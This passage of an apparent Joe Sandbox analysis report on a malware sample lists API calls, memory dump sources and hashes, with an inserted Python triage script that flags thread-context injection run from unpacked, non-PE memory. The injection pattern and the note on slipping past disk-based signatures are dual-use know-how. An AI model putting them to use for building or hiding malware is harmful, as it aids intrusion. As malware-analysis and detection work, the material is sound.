  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
• std::bad_exception::bad_exception.LIBCMT ref: 0041176B
• __CxxThrowException@8.LIBCMT ref: 00411779
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
• Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
• Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
• Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
• Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
• Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                    • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                    • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                    • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                    • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 00435278
                                                                                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                    • _malloc.LIBCMT ref: 00435288
                                                                                                                                    • _malloc.LIBCMT ref: 00435298
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 680241177-0
                                                                                                                                    • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                    • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                    • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                    • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00401B71
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: @EXITCODE
                                                                                                                                    • API String ID: 580348202-3436989551
                                                                                                                                    • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                    • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                    • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                    • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                    • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                    • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                    • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                    • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                    • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                    • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                    • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                      • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 717694121-0
                                                                                                                                    • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                    • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                    • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                    • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03F93AAB
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F93B41
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F93B63
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                    • Instruction ID: e7435f7a20dcb573f12d37415663a529b8b6f5ab7aa5826031335e51c213627e
                                                                                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                    • Instruction Fuzzy Hash: F912CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
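The block above is the one function in this listing whose API set (CreateProcessW, then Wow64GetThreadContext and ReadProcessMemory on the new process) has the shape of thread-context injection, and it is also the one function whose memory dump source is a region not backed by a PE (Offset 03F92000, "based on PE: false"), i.e. an unpacked stage rather than the on-disk image. The Python below is an added example, not Joe Sandbox tooling: it parses the per-function "APIs" / "Memory Dump Source" text exactly as laid out in this report and flags function blocks whose API set matches that pattern. The API groupings (SPAWN, CONTEXT, REMOTE_MEM) and the flag names are this example's own heuristic, not a Joe Sandbox signature; the sample lines are copied from this report section.

```python
"""Parse Joe Sandbox per-function API listings and flag injection-style API sets.

Added example, not Joe Sandbox tooling. The regexes follow the text layout of
this report; the API groupings below are this example's own heuristic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: "• Name.MODULE(args), ref: ADDR" or "• _name.LIBCMT ref: ADDR",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "Source File: <dump>.sdmp, Offset: ..., based on PE: true|false"
SOURCE_LINE = re.compile(r"Source File:\s*(?P<file>\S+),.*based on PE:\s*(?P<pe>true|false)")
HEX_ARG = re.compile(r"^[0-9A-Fa-f]+$")

# Heuristic groupings (assumption): spawning a process, then touching its thread
# context and its memory, is the shape of process hollowing / context injection.
SPAWN = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
CONTEXT = {"GetThreadContext", "SetThreadContext", "Wow64GetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEM = {"ReadProcessMemory", "WriteProcessMemory", "NtUnmapViewOfSection", "VirtualAllocEx"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: bool  # True when the report attributes the call to a callee


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    source_file: str = ""
    pe_backed: Optional[bool] = None  # None until a "Source File" line is seen


def parse_blocks(report_text: str) -> list[FunctionBlock]:
    """Split the report text into function blocks; each starts at an 'APIs' line."""
    blocks: list[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(raw)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], bool(m["sub"])))
            continue
        s = SOURCE_LINE.search(line)
        if s:
            current.source_file = s["file"]
            current.pe_backed = s["pe"] == "true"
    return blocks


def string_args(call: ApiCall) -> list[str]:
    """Arguments the report resolved to strings (not hex words, not unresolved '?')."""
    return [a for a in call.args if a != "?" and not HEX_ARG.match(a)]


def flags_for(block: FunctionBlock) -> list[str]:
    """Apply the heuristic to the function's own (non-subcall) API names."""
    names = {c.name for c in block.calls if not c.subcall}
    flags: list[str] = []
    if names & SPAWN and names & CONTEXT and names & REMOTE_MEM:
        flags.append("thread-context-injection")
    if flags and block.pe_backed is False:
        flags.append("from-non-pe-memory")  # code ran from a region with no PE image behind it
    return flags


def triage(report_text: str) -> list[dict]:
    """Return one finding per flagged block: index, dump source, API names, flags."""
    findings = []
    for i, b in enumerate(parse_blocks(report_text)):
        f = flags_for(b)
        if f:
            findings.append({"block": i, "source": b.source_file,
                             "apis": sorted(c.name for c in b.calls), "flags": f})
    return findings


# Sample input: lines copied from this report section (a constructed subset).
SAMPLE_REPORT = r"""
APIs
• RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
• RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03F93AAB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F93B41
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F93B63
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_REPORT):
        print(finding)
```

Subcall lines are parsed but excluded from the heuristic on purpose: a `RtlAllocateHeap` reached through `_malloc` says nothing about the caller's intent, whereas the three calls in the flagged block are the function's own. The "from-non-pe-memory" flag is the detail worth carrying into a hunt: the injecting code lives at 03F92000 with no PE behind it, so a disk-based signature on `Doc 784-01965670.exe` will not describe the stage that actually does the injection.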
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                                    • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                    • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                                    • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 181713994-0
                                                                                                                                    • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                    • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                    • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                    • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                    • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                    • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                    • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                    • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                                    • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                    • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
